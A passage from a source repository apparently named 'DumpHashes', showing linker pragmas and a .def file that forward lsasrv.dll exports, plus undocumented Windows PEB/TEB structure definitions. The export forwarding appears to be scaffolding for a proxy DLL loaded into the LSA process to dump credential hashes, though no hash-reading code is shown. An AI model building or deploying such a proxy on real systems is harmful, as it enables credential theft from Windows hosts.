210 | #pragma comment(linker, "/export:LsapDbFreeAttributes=lsasrv.dll.LsapDbFreeAttributes,@243")
211 | #pragma comment(linker, "/export:LsapDbFreeTrustedDomainsEx=lsasrv.dll.LsapDbFreeTrustedDomainsEx,@244")
212 | #pragma comment(linker, "/export:LsapDbGetDbObjectTypeName=lsasrv.dll.LsapDbGetDbObjectTypeName,@245")
213 | #pragma comment(linker, "/export:LsapDbGetDbPolicyHandle=lsasrv.dll.LsapDbGetDbPolicyHandle,@246")
214 | #pragma comment(linker, "/export:LsapDbGetSecretType=lsasrv.dll.LsapDbGetSecretType,@247")
215 | #pragma comment(linker, "/export:LsapDbInitializeAttribute=lsasrv.dll.LsapDbInitializeAttribute,@248")
216 | #pragma comment(linker, "/export:LsapDbIsStatusConnectionFailure=lsasrv.dll.LsapDbIsStatusConnectionFailure,@249")
217 | #pragma comment(linker, "/export:LsapDbLookupAddListReferencedDomains=lsasrv.dll.LsapDbLookupAddListReferencedDomains,@250")
218 | #pragma comment(linker, "/export:LsapDbLookupCreateListReferencedDomains=lsasrv.dll.LsapDbLookupCreateListReferencedDomains,@251")
219 | #pragma comment(linker, "/export:LsapDbLookupGetDomainInfo=lsasrv.dll.LsapDbLookupGetDomainInfo,@252")
220 | #pragma comment(linker, "/export:LsapDbLookupListReferencedDomains=lsasrv.dll.LsapDbLookupListReferencedDomains,@253")
221 | #pragma comment(linker, "/export:LsapDbLookupMergeDisjointReferencedDomains=lsasrv.dll.LsapDbLookupMergeDisjointReferencedDomains,@254")
222 | #pragma comment(linker, "/export:LsapDbLookupNameChainRequest=lsasrv.dll.LsapDbLookupNameChainRequest,@255")
223 | #pragma comment(linker, "/export:LsapDbLookupNamesInPrimaryDomain=lsasrv.dll.LsapDbLookupNamesInPrimaryDomain,@256")
224 | #pragma comment(linker, "/export:LsapDbLookupSidsInPrimaryDomain=lsasrv.dll.LsapDbLookupSidsInPrimaryDomain,@257")
225 | #pragma comment(linker, "/export:LsapDbMakeGuidAttribute=lsasrv.dll.LsapDbMakeGuidAttribute,@258")
226 | #pragma comment(linker, "/export:LsapDbMakeSidAttribute=lsasrv.dll.LsapDbMakeSidAttribute,@259")
227 | #pragma comment(linker, "/export:LsapDbMakeUnicodeAttribute=lsasrv.dll.LsapDbMakeUnicodeAttribute,@260")
228 | #pragma comment(linker, "/export:LsapDbOpenObject=lsasrv.dll.LsapDbOpenObject,@261")
229 | #pragma comment(linker, "/export:LsapDbQueryInformationPolicy=lsasrv.dll.LsapDbQueryInformationPolicy,@262")
230 | #pragma comment(linker, "/export:LsapDbReadAttribute=lsasrv.dll.LsapDbReadAttribute,@263")
231 | #pragma comment(linker, "/export:LsapDbReadAttributesObject=lsasrv.dll.LsapDbReadAttributesObject,@264")
232 | #pragma comment(linker, "/export:LsapDbReferenceObject=lsasrv.dll.LsapDbReferenceObject,@265")
233 | #pragma comment(linker, "/export:LsapDbReleaseLockEx=lsasrv.dll.LsapDbReleaseLockEx,@266")
234 | #pragma comment(linker, "/export:LsapDbSecretIsMachineAcc=lsasrv.dll.LsapDbSecretIsMachineAcc,@267")
235 | #pragma comment(linker, "/export:LsapDbSidToLogicalNameObject=lsasrv.dll.LsapDbSidToLogicalNameObject,@268")
236 | #pragma comment(linker, "/export:LsapDbSlowEnumerateTrustedDomains=lsasrv.dll.LsapDbSlowEnumerateTrustedDomains,@269")
237 | #pragma comment(linker, "/export:LsapDbUpdateCountCompUnmappedNames=lsasrv.dll.LsapDbUpdateCountCompUnmappedNames,@270")
238 | #pragma comment(linker, "/export:LsapDbVerifyHandle=lsasrv.dll.LsapDbVerifyHandle,@271")
239 | #pragma comment(linker, "/export:LsapDbVerifyInfoQueryTrustedDomain=lsasrv.dll.LsapDbVerifyInfoQueryTrustedDomain,@272")
240 | #pragma comment(linker, "/export:LsapDbVerifyInfoSetTrustedDomain=lsasrv.dll.LsapDbVerifyInfoSetTrustedDomain,@273")
241 | #pragma comment(linker, "/export:LsapDbWriteAttributesObject=lsasrv.dll.LsapDbWriteAttributesObject,@274")
242 | #pragma comment(linker, "/export:LsapDomainRenameHandlerForLogonSessions=lsasrv.dll.LsapDomainRenameHandlerForLogonSessions,@275")
243 | #pragma comment(linker, "/export:LsapDsInitializeDsStateInfo=lsasrv.dll.LsapDsInitializeDsStateInfo,@276")
244 | #pragma comment(linker, "/export:LsapDsUnitializeDsStateInfo=lsasrv.dll.LsapDsUnitializeDsStateInfo,@277")
245 | #pragma comment(linker, "/export:LsapDssetupInitializeGetPrimaryDomainInformationOpState=lsasrv.dll.LsapDssetupInitializeGetPrimaryDomainInformationOpState,@278")
246 | #pragma comment(linker, "/export:LsapDuplicateSid=lsasrv.dll.LsapDuplicateSid,@279")
247 | #pragma comment(linker, "/export:LsapDuplicateString=lsasrv.dll.LsapDuplicateString,@280")
248 | #pragma comment(linker, "/export:LsapFreeLsaHeap=lsasrv.dll.LsapFreeLsaHeap,@281")
249 | #pragma comment(linker, "/export:LsapFreePrivateHeap=lsasrv.dll.LsapFreePrivateHeap,@282")
250 | #pragma comment(linker, "/export:LsapFreeString=lsasrv.dll.LsapFreeString,@283")
251 | #pragma comment(linker, "/export:LsapGetAccountDomainHandle=lsasrv.dll.LsapGetAccountDomainHandle,@284")
252 | #pragma comment(linker, "/export:LsapGetCapeNamesForCap=lsasrv.dll.LsapGetCapeNamesForCap,@285")
253 | #pragma comment(linker, "/export:LsapGetGlobalRestrictAnonymous=lsasrv.dll.LsapGetGlobalRestrictAnonymous,@286")
254 | #pragma comment(linker, "/export:LsapGetHourlyLogLevel=lsasrv.dll.LsapGetHourlyLogLevel,@287")
255 | #pragma comment(linker, "/export:LsapGetLogonSessionAccountInfoEx=lsasrv.dll.LsapGetLogonSessionAccountInfoEx,@288")
256 | #pragma comment(linker, "/export:LsapGetLookupRestrictIsolatedNameLevel=lsasrv.dll.LsapGetLookupRestrictIsolatedNameLevel,@289")
257 | #pragma comment(linker, "/export:LsapGetPolicyHandle=lsasrv.dll.LsapGetPolicyHandle,@290")
258 | #pragma comment(linker, "/export:LsapGetWellKnownSid=lsasrv.dll.LsapGetWellKnownSid,@291")
259 | #pragma comment(linker, "/export:LsapInitLsa=lsasrv.dll.LsapInitLsa,@292")
260 | #pragma comment(linker, "/export:LsapInitializeLsaDb=lsasrv.dll.LsapInitializeLsaDb,@293")
261 | #pragma comment(linker, "/export:LsapIsBuiltinDomain=lsasrv.dll.LsapIsBuiltinDomain,@294")
262 | #pragma comment(linker, "/export:LsapIsSamOpened=lsasrv.dll.LsapIsSamOpened,@295")
263 | #pragma comment(linker, "/export:LsapOpenSam=lsasrv.dll.LsapOpenSam,@296")
264 | #pragma comment(linker, "/export:LsapQueryClientInfo=lsasrv.dll.LsapQueryClientInfo,@297")
265 | #pragma comment(linker, "/export:LsapRemoveTrailingDot=lsasrv.dll.LsapRemoveTrailingDot,@298")
266 | #pragma comment(linker, "/export:LsapRpcCopySid=lsasrv.dll.LsapRpcCopySid,@299")
267 | #pragma comment(linker, "/export:LsapRpcCopyUnicodeString=lsasrv.dll.LsapRpcCopyUnicodeString,@300")
268 | #pragma comment(linker, "/export:LsapRtlValidateControllerTrustedDomain=lsasrv.dll.LsapRtlValidateControllerTrustedDomain,@301")
269 | #pragma comment(linker, "/export:LsapRtlValidateControllerTrustedDomainByHandle=lsasrv.dll.LsapRtlValidateControllerTrustedDomainByHandle,@302")
270 | #pragma comment(linker, "/export:LsapSetErrorInfo=lsasrv.dll.LsapSetErrorInfo,@303")
271 | #pragma comment(linker, "/export:LsapSidListSize=lsasrv.dll.LsapSidListSize,@304")
272 | #pragma comment(linker, "/export:LsapTraceEvent=lsasrv.dll.LsapTraceEvent,@305")
273 | #pragma comment(linker, "/export:LsapTraceEventWithData=lsasrv.dll.LsapTraceEventWithData,@306")
274 | #pragma comment(linker, "/export:LsapTruncateUnicodeString=lsasrv.dll.LsapTruncateUnicodeString,@307")
275 | #pragma comment(linker, "/export:LsarClose=lsasrv.dll.LsarClose,@308")
276 | #pragma comment(linker, "/export:LsarCreateSecret=lsasrv.dll.LsarCreateSecret,@309")
277 | #pragma comment(linker, "/export:LsarDeleteObject=lsasrv.dll.LsarDeleteObject,@310")
278 | #pragma comment(linker, "/export:LsarEnumerateTrustedDomainsEx=lsasrv.dll.LsarEnumerateTrustedDomainsEx,@311")
279 | #pragma comment(linker, "/export:LsarLookupSids=lsasrv.dll.LsarLookupSids,@312")
280 | #pragma comment(linker, "/export:LsarOpenPolicy=lsasrv.dll.LsarOpenPolicy,@313")
281 | #pragma comment(linker, "/export:LsarOpenSecret=lsasrv.dll.LsarOpenSecret,@314")
282 | #pragma comment(linker, "/export:LsarQueryDomainInformationPolicy=lsasrv.dll.LsarQueryDomainInformationPolicy,@315")
283 | #pragma comment(linker, "/export:LsarQueryInformationPolicy=lsasrv.dll.LsarQueryInformationPolicy,@316")
284 | #pragma comment(linker, "/export:LsarQuerySecret=lsasrv.dll.LsarQuerySecret,@317")
285 | #pragma comment(linker, "/export:LsarQueryTrustedDomainInfoByName=lsasrv.dll.LsarQueryTrustedDomainInfoByName,@318")
286 | #pragma comment(linker, "/export:LsarRetrievePrivateData=lsasrv.dll.LsarRetrievePrivateData,@319")
287 | #pragma comment(linker, "/export:LsarSetInformationPolicy=lsasrv.dll.LsarSetInformationPolicy,@320")
288 | #pragma comment(linker, "/export:LsarSetSecret=lsasrv.dll.LsarSetSecret,@321")
289 | #pragma comment(linker, "/export:LsarSetTrustedDomainInfoByName=lsasrv.dll.LsarSetTrustedDomainInfoByName,@322")
290 | #pragma comment(linker, "/export:LsarStorePrivateData=lsasrv.dll.LsarStorePrivateData,@323")
291 | #pragma comment(linker, "/export:QueryLsaInterface=lsasrv.dll.QueryLsaInterface,@50")
292 | #pragma comment(linker, "/export:ServiceInit=lsasrv.dll.ServiceInit,@324")
293 | #pragma comment(linker, "/export:TracePrint=lsasrv.dll.TracePrint,@51")
294 | #pragma comment(linker, "/export:TracePrintCallerInformation=lsasrv.dll.TracePrintCallerInformation,@52")
295 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUSTED_DOMAIN_FULL_INFORMATION2=lsasrv.dll._fgs__LSAPR_TRUSTED_DOMAIN_FULL_INFORMATION2,@325")
296 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUSTED_DOMAIN_INFORMATION_EX2=lsasrv.dll._fgs__LSAPR_TRUSTED_DOMAIN_INFORMATION_EX2,@326")
297 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUSTED_ENUM_BUFFER=lsasrv.dll._fgs__LSAPR_TRUSTED_ENUM_BUFFER,@327")
298 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUSTED_ENUM_BUFFER_EX=lsasrv.dll._fgs__LSAPR_TRUSTED_ENUM_BUFFER_EX,@328")
299 | #pragma comment(linker, "/export:_fgs__LSAPR_TRUST_INFORMATION=lsasrv.dll._fgs__LSAPR_TRUST_INFORMATION,@329")
300 | #pragma comment(linker, "/export:_fgu__LSAPR_TRUSTED_DOMAIN_INFO=lsasrv.dll._fgu__LSAPR_TRUSTED_DOMAIN_INFO,@330")
301 | 
302 | 


--------------------------------------------------------------------------------
/DumpHashes/Source.def:
--------------------------------------------------------------------------------
 1 | LIBRARY
 2 | EXPORTS
 3 | 	@1		= lsasrv.#1		@1		NONAME
 4 | 	@2		= lsasrv.#2		@2		NONAME
 5 | 	@3		= lsasrv.#3		@3		NONAME
 6 | 	@4		= lsasrv.#4		@4		NONAME
 7 | 	@5		= lsasrv.#5		@5 		NONAME
 8 | 	@6		= lsasrv.#6		@6 		NONAME
 9 | 	@7		= lsasrv.#7		@7 		NONAME
10 | 	@8		= lsasrv.#8		@8 		NONAME
11 | 	@9		= lsasrv.#9		@9 		NONAME
12 | 	@10		= lsasrv.#10	@10		NONAME
13 | 	@11		= lsasrv.#11	@11		NONAME
14 | 	@12		= lsasrv.#12	@12		NONAME
15 | 	@13		= lsasrv.#13	@13		NONAME
16 | 	@14		= lsasrv.#14	@14		NONAME
17 | 	@15		= lsasrv.#15	@15		NONAME
18 | 	@16		= lsasrv.#16	@16		NONAME
19 | 	@17		= lsasrv.#17	@17		NONAME
20 | 	@18		= lsasrv.#18	@18		NONAME
21 | 	@19		= lsasrv.#19	@19		NONAME
22 | 	@20		= lsasrv.#20	@20		NONAME
23 | 	@21		= lsasrv.#21	@21		NONAME
24 | 	@22		= lsasrv.#22	@22		NONAME
25 | 	@23		= lsasrv.#23	@23		NONAME
26 | 	@24		= lsasrv.#24	@24		NONAME
27 | 	@25		= lsasrv.#25	@25		NONAME
28 | 	@26		= lsasrv.#26	@26		NONAME
29 | 	@27		= lsasrv.#27	@27		NONAME
30 | 	@28		= lsasrv.#28	@28		NONAME
31 | 	@29		= lsasrv.#29	@29		NONAME
32 | 	@30		= lsasrv.#30	@30		NONAME
33 | 	@31		= lsasrv.#31	@31		NONAME
34 | 	@32		= lsasrv.#32	@32		NONAME
35 | 	@33		= lsasrv.#33	@33		NONAME
36 | 	@34		= lsasrv.#34	@34		NONAME
37 | 	@35		= lsasrv.#35	@35		NONAME
38 | 	@36		= lsasrv.#36	@36		NONAME
39 | 	@37		= lsasrv.#37	@37		NONAME
40 | 	@38		= lsasrv.#38	@38		NONAME
41 | 	@39		= lsasrv.#39	@39		NONAME
42 | 


--------------------------------------------------------------------------------
/DumpHashes/Structs.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | 
  3 | 
  4 | #ifndef STRUCTS_H
  5 | #define STRUCTS_H
  6 | 
  7 | #include <Windows.h>
  8 | 
  9 | 
 10 | typedef struct _UNICODE_STRING {
 11 |     USHORT Length;
 12 |     USHORT MaximumLength;
 13 |     PWSTR  Buffer;
 14 | } UNICODE_STRING, * PUNICODE_STRING;
 15 | 
 16 | typedef struct _STRING
 17 | {
 18 |     USHORT Length;
 19 |     USHORT MaximumLength;
 20 |     PCHAR  Buffer;
 21 | } STRING, * PSTRING, ANSI_STRING, * PANSI_STRING, OEM_STRING, * POEM_STRING;
 22 | 
 23 | 
 24 | typedef struct _PEB_LDR_DATA
 25 | {
 26 |     ULONG Length;
 27 |     BOOLEAN Initialized;
 28 |     HANDLE SsHandle;
 29 |     LIST_ENTRY InLoadOrderModuleList;
 30 |     LIST_ENTRY InMemoryOrderModuleList;
 31 |     LIST_ENTRY InInitializationOrderModuleList;
 32 |     PVOID EntryInProgress;
 33 |     BOOLEAN ShutdownInProgress;
 34 |     HANDLE ShutdownThreadId;
 35 | } PEB_LDR_DATA, * PPEB_LDR_DATA;
 36 | 
 37 | 
 38 | 
 39 | typedef struct _CURDIR
 40 | {
 41 |     UNICODE_STRING DosPath;
 42 |     HANDLE Handle;
 43 | } CURDIR, * PCURDIR;
 44 | 
 45 | #define RTL_USER_PROC_CURDIR_CLOSE 0x00000002
 46 | #define RTL_USER_PROC_CURDIR_INHERIT 0x00000003
 47 | 
 48 | typedef struct _RTL_DRIVE_LETTER_CURDIR
 49 | {
 50 |     USHORT Flags;
 51 |     USHORT Length;
 52 |     ULONG TimeStamp;
 53 |     STRING DosPath;
 54 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
 55 | 
 56 | #define RTL_MAX_DRIVE_LETTERS 32
 57 | #define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
 58 | 
 59 | typedef struct _RTL_USER_PROCESS_PARAMETERS
 60 | {
 61 |     ULONG MaximumLength;
 62 |     ULONG Length;
 63 | 
 64 |     ULONG Flags;
 65 |     ULONG DebugFlags;
 66 | 
 67 |     HANDLE ConsoleHandle;
 68 |     ULONG ConsoleFlags;
 69 |     HANDLE StandardInput;
 70 |     HANDLE StandardOutput;
 71 |     HANDLE StandardError;
 72 | 
 73 |     CURDIR CurrentDirectory;
 74 |     UNICODE_STRING DllPath;
 75 |     UNICODE_STRING ImagePathName;
 76 |     UNICODE_STRING CommandLine;
 77 |     PVOID Environment;
 78 | 
 79 |     ULONG StartingX;
 80 |     ULONG StartingY;
 81 |     ULONG CountX;
 82 |     ULONG CountY;
 83 |     ULONG CountCharsX;
 84 |     ULONG CountCharsY;
 85 |     ULONG FillAttribute;
 86 | 
 87 |     ULONG WindowFlags;
 88 |     ULONG ShowWindowFlags;
 89 |     UNICODE_STRING WindowTitle;
 90 |     UNICODE_STRING DesktopInfo;
 91 |     UNICODE_STRING ShellInfo;
 92 |     UNICODE_STRING RuntimeData;
 93 |     RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
 94 | 
 95 |     ULONG_PTR EnvironmentSize;
 96 |     ULONG_PTR EnvironmentVersion;
 97 | 
 98 |     PVOID PackageDependencyData;
 99 |     ULONG ProcessGroupId;
100 |     ULONG LoaderThreads;
101 | 
102 |     UNICODE_STRING RedirectionDllName; // REDSTONE4
103 |     UNICODE_STRING HeapPartitionName; // 19H1
104 |     ULONG_PTR DefaultThreadpoolCpuSetMasks;
105 |     ULONG DefaultThreadpoolCpuSetMaskCount;
106 |     ULONG DefaultThreadpoolThreadMaximum;
107 |     ULONG HeapMemoryTypeMask; // WIN11
108 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
109 | 
110 | 
111 | typedef struct _API_SET_NAMESPACE
112 | {
113 |     ULONG Version;
114 |     ULONG Size;
115 |     ULONG Flags;
116 |     ULONG Count;
117 |     ULONG EntryOffset;
118 |     ULONG HashOffset;
119 |     ULONG HashFactor;
120 | } API_SET_NAMESPACE, * PAPI_SET_NAMESPACE;
121 | 
122 | 
123 | #define GDI_HANDLE_BUFFER_SIZE32 34
124 | #define GDI_HANDLE_BUFFER_SIZE64 60
125 | 
126 | #ifndef _WIN64
127 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32
128 | #else
129 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64
130 | #endif
131 | 
132 | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
133 | 
134 | typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
135 | typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
136 | 
137 | typedef struct _ACTIVATION_CONTEXT_DATA
138 | {
139 |     ULONG Magic;
140 |     ULONG HeaderSize;
141 |     ULONG FormatVersion;
142 |     ULONG TotalSize;
143 |     ULONG DefaultTocOffset; // to ACTIVATION_CONTEXT_DATA_TOC_HEADER
144 |     ULONG ExtendedTocOffset; // to ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER
145 |     ULONG AssemblyRosterOffset; // to ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER
146 |     ULONG Flags; // ACTIVATION_CONTEXT_FLAG_*
147 | } ACTIVATION_CONTEXT_DATA, * PACTIVATION_CONTEXT_DATA;
148 | 
149 | 
150 | typedef struct _ASSEMBLY_STORAGE_MAP_ENTRY
151 | {
152 |     ULONG Flags;
153 |     UNICODE_STRING DosPath;
154 |     HANDLE Handle;
155 | } ASSEMBLY_STORAGE_MAP_ENTRY, * PASSEMBLY_STORAGE_MAP_ENTRY;
156 | 
157 | typedef struct _ASSEMBLY_STORAGE_MAP
158 | {
159 |     ULONG Flags;
160 |     ULONG AssemblyCount;
161 |     PASSEMBLY_STORAGE_MAP_ENTRY* AssemblyArray;
162 | } ASSEMBLY_STORAGE_MAP, * PASSEMBLY_STORAGE_MAP;
163 | 
164 | typedef struct _PEB
165 | {
166 |     BOOLEAN InheritedAddressSpace;
167 |     BOOLEAN ReadImageFileExecOptions;
168 |     BOOLEAN BeingDebugged;
169 |     union
170 |     {
171 |         BOOLEAN BitField;
172 |         struct
173 |         {
174 |             BOOLEAN ImageUsesLargePages : 1;
175 |             BOOLEAN IsProtectedProcess : 1;
176 |             BOOLEAN IsImageDynamicallyRelocated : 1;
177 |             BOOLEAN SkipPatchingUser32Forwarders : 1;
178 |             BOOLEAN IsPackagedProcess : 1;
179 |             BOOLEAN IsAppContainer : 1;
180 |             BOOLEAN IsProtectedProcessLight : 1;
181 |             BOOLEAN IsLongPathAwareProcess : 1;
182 |         };
183 |     };
184 | 
185 |     HANDLE Mutant;
186 | 
187 |     PVOID ImageBaseAddress;
188 |     PPEB_LDR_DATA Ldr;
189 |     PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
190 |     PVOID SubSystemData;
191 |     PVOID ProcessHeap;
192 |     PRTL_CRITICAL_SECTION FastPebLock;
193 |     PSLIST_HEADER AtlThunkSListPtr;
194 |     PVOID IFEOKey;
195 | 
196 |     union
197 |     {
198 |         ULONG CrossProcessFlags;
199 |         struct
200 |         {
201 |             ULONG ProcessInJob : 1;
202 |             ULONG ProcessInitializing : 1;
203 |             ULONG ProcessUsingVEH : 1;
204 |             ULONG ProcessUsingVCH : 1;
205 |             ULONG ProcessUsingFTH : 1;
206 |             ULONG ProcessPreviouslyThrottled : 1;
207 |             ULONG ProcessCurrentlyThrottled : 1;
208 |             ULONG ProcessImagesHotPatched : 1; // REDSTONE5
209 |             ULONG ReservedBits0 : 24;
210 |         };
211 |     };
212 |     union
213 |     {
214 |         PVOID KernelCallbackTable;
215 |         PVOID UserSharedInfoPtr;
216 |     };
217 |     ULONG SystemReserved;
218 |     ULONG AtlThunkSListPtr32;
219 |     PAPI_SET_NAMESPACE ApiSetMap;
220 |     ULONG TlsExpansionCounter;
221 |     PVOID TlsBitmap;
222 |     ULONG TlsBitmapBits[2];
223 | 
224 |     PVOID ReadOnlySharedMemoryBase;
225 |     PVOID SharedData; // HotpatchInformation
226 |     PVOID* ReadOnlyStaticServerData;
227 | 
228 |     PVOID AnsiCodePageData; // PCPTABLEINFO
229 |     PVOID OemCodePageData; // PCPTABLEINFO
230 |     PVOID UnicodeCaseTableData; // PNLSTABLEINFO
231 | 
232 |     ULONG NumberOfProcessors;
233 |     ULONG NtGlobalFlag;
234 | 
235 |     ULARGE_INTEGER CriticalSectionTimeout;
236 |     SIZE_T HeapSegmentReserve;
237 |     SIZE_T HeapSegmentCommit;
238 |     SIZE_T HeapDeCommitTotalFreeThreshold;
239 |     SIZE_T HeapDeCommitFreeBlockThreshold;
240 | 
241 |     ULONG NumberOfHeaps;
242 |     ULONG MaximumNumberOfHeaps;
243 |     PVOID* ProcessHeaps; // PHEAP
244 | 
245 |     PVOID GdiSharedHandleTable; // PGDI_SHARED_MEMORY
246 |     PVOID ProcessStarterHelper;
247 |     ULONG GdiDCAttributeList;
248 | 
249 |     PRTL_CRITICAL_SECTION LoaderLock;
250 | 
251 |     ULONG OSMajorVersion;
252 |     ULONG OSMinorVersion;
253 |     USHORT OSBuildNumber;
254 |     USHORT OSCSDVersion;
255 |     ULONG OSPlatformId;
256 |     ULONG ImageSubsystem;
257 |     ULONG ImageSubsystemMajorVersion;
258 |     ULONG ImageSubsystemMinorVersion;
259 |     KAFFINITY ActiveProcessAffinityMask;
260 |     GDI_HANDLE_BUFFER GdiHandleBuffer;
261 |     PVOID PostProcessInitRoutine;
262 | 
263 |     PVOID TlsExpansionBitmap;
264 |     ULONG TlsExpansionBitmapBits[32];
265 | 
266 |     ULONG SessionId;
267 | 
268 |     ULARGE_INTEGER AppCompatFlags;
269 |     ULARGE_INTEGER AppCompatFlagsUser;
270 |     PVOID pShimData;
271 |     PVOID AppCompatInfo; // APPCOMPAT_EXE_DATA
272 | 
273 |     UNICODE_STRING CSDVersion;
274 | 
275 |     PACTIVATION_CONTEXT_DATA ActivationContextData;
276 |     PASSEMBLY_STORAGE_MAP ProcessAssemblyStorageMap;
277 |     PACTIVATION_CONTEXT_DATA SystemDefaultActivationContextData;
278 |     PASSEMBLY_STORAGE_MAP SystemAssemblyStorageMap;
279 | 
280 |     SIZE_T MinimumStackCommit;
281 | 
282 |     PVOID SparePointers[2]; // 19H1 (previously FlsCallback to FlsHighIndex)
283 |     PVOID PatchLoaderData;
284 |     PVOID ChpeV2ProcessInfo; // _CHPEV2_PROCESS_INFO
285 | 
286 |     ULONG AppModelFeatureState;
287 |     ULONG SpareUlongs[2];
288 | 
289 |     USHORT ActiveCodePage;
290 |     USHORT OemCodePage;
291 |     USHORT UseCaseMapping;
292 |     USHORT UnusedNlsField;
293 | 
294 |     PVOID WerRegistrationData;
295 |     PVOID WerShipAssertPtr;
296 | 
297 |     union
298 |     {
299 |         PVOID pContextData; // WIN7
300 |         PVOID pUnused; // WIN10
301 |         PVOID EcCodeBitMap; // WIN11
302 |     };
303 | 
304 |     PVOID pImageHeaderHash;
305 |     union
306 |     {
307 |         ULONG TracingFlags;
308 |         struct
309 |         {
310 |             ULONG HeapTracingEnabled : 1;
311 |             ULONG CritSecTracingEnabled : 1;
312 |             ULONG LibLoaderTracingEnabled : 1;
313 |             ULONG SpareTracingBits : 29;
314 |         };
315 |     };
316 |     ULONGLONG CsrServerReadOnlySharedMemoryBase;
317 |     PRTL_CRITICAL_SECTION TppWorkerpListLock;
318 |     LIST_ENTRY TppWorkerpList;
319 |     PVOID WaitOnAddressHashTable[128];
320 |     PVOID TelemetryCoverageHeader; // REDSTONE3
321 |     ULONG CloudFileFlags;
322 |     ULONG CloudFileDiagFlags; // REDSTONE4
323 |     CHAR PlaceholderCompatibilityMode;
324 |     CHAR PlaceholderCompatibilityModeReserved[7];
325 |     struct _LEAP_SECOND_DATA* LeapSecondData; // REDSTONE5
326 |     union
327 |     {
328 |         ULONG LeapSecondFlags;
329 |         struct
330 |         {
331 |             ULONG SixtySecondEnabled : 1;
332 |             ULONG Reserved : 31;
333 |         };
334 |     };
335 |     ULONG NtGlobalFlag2;
336 |     ULONGLONG ExtendedFeatureDisableMask; // since WIN11
337 | } PEB, * PPEB;
338 | 
339 | 
340 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT
341 | {
342 |     ULONG Flags;
343 |     PSTR FrameName;
344 | } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
345 | 
346 | typedef struct _TEB_ACTIVE_FRAME
347 | {
348 |     ULONG Flags;
349 |     struct _TEB_ACTIVE_FRAME* Previous;
350 |     PTEB_ACTIVE_FRAME_CONTEXT Context;
351 | } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
352 | 
353 | 
354 | typedef struct _CLIENT_ID
355 | {
356 |     HANDLE UniqueProcess;
357 |     HANDLE UniqueThread;
358 | } CLIENT_ID, * PCLIENT_ID;
359 | 
360 | 
361 | typedef VOID(NTAPI* PACTIVATION_CONTEXT_NOTIFY_ROUTINE)(
362 |     IN ULONG NotificationType, // ACTIVATION_CONTEXT_NOTIFICATION_*
363 |     IN struct _ACTIVATION_CONTEXT* ActivationContext,
364 |     IN PACTIVATION_CONTEXT_DATA ActivationContextData,
365 |     _In_opt_ PVOID NotificationContext,
366 |     _In_opt_ PVOID NotificationData,
367 |     _Inout_ PBOOLEAN DisableThisNotification
368 |     );
369 | 
370 | typedef struct _ACTIVATION_CONTEXT
371 | {
372 |     LONG RefCount;
373 |     ULONG Flags;
374 |     PACTIVATION_CONTEXT_DATA ActivationContextData;
375 |     PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine;
376 |     PVOID NotificationContext;
377 |     ULONG SentNotifications[8];
378 |     ULONG DisabledNotifications[8];
379 |     ASSEMBLY_STORAGE_MAP StorageMap;
380 |     PASSEMBLY_STORAGE_MAP_ENTRY InlineStorageMapEntries[32];
381 | } ACTIVATION_CONTEXT, * PACTIVATION_CONTEXT;
382 | 
383 | 
384 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME
385 | {
386 |     struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
387 |     PACTIVATION_CONTEXT ActivationContext;
388 |     ULONG Flags; // RTL_ACTIVATION_CONTEXT_STACK_FRAME_FLAG_*
389 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
390 | 
391 | typedef struct _ACTIVATION_CONTEXT_STACK
392 | {
393 |     PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
394 |     LIST_ENTRY FrameListCache;
395 |     ULONG Flags; // ACTIVATION_CONTEXT_STACK_FLAG_*
396 |     ULONG NextCookieSequenceNumber;
397 |     ULONG StackId;
398 | } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
399 | 
400 | 
401 | #define GDI_BATCH_BUFFER_SIZE 310
402 | 
403 | typedef struct _GDI_TEB_BATCH
404 | {
405 |     ULONG Offset;
406 |     ULONG_PTR HDC;
407 |     ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
408 | } GDI_TEB_BATCH, * PGDI_TEB_BATCH;
409 | 
410 | typedef struct _TEB
411 | {
412 |     NT_TIB NtTib;
413 | 
414 |     PVOID EnvironmentPointer;
415 |     CLIENT_ID ClientId;
416 |     PVOID ActiveRpcHandle;
417 |     PVOID ThreadLocalStoragePointer;
418 |     PPEB ProcessEnvironmentBlock;
419 | 
420 |     ULONG LastErrorValue;
421 |     ULONG CountOfOwnedCriticalSections;
422 |     PVOID CsrClientThread;
423 |     PVOID Win32ThreadInfo;
424 |     ULONG User32Reserved[26];
425 |     ULONG UserReserved[5];
426 |     PVOID WOW32Reserved;
427 |     LCID CurrentLocale;
428 |     ULONG FpSoftwareStatusRegister;
429 |     PVOID ReservedForDebuggerInstrumentation[16];
430 | #ifdef _WIN64
431 |     PVOID SystemReserved1[30];
432 | #else
433 |     PVOID SystemReserved1[26];
434 | #endif
435 | 
436 |     CHAR PlaceholderCompatibilityMode;
437 |     BOOLEAN PlaceholderHydrationAlwaysExplicit;
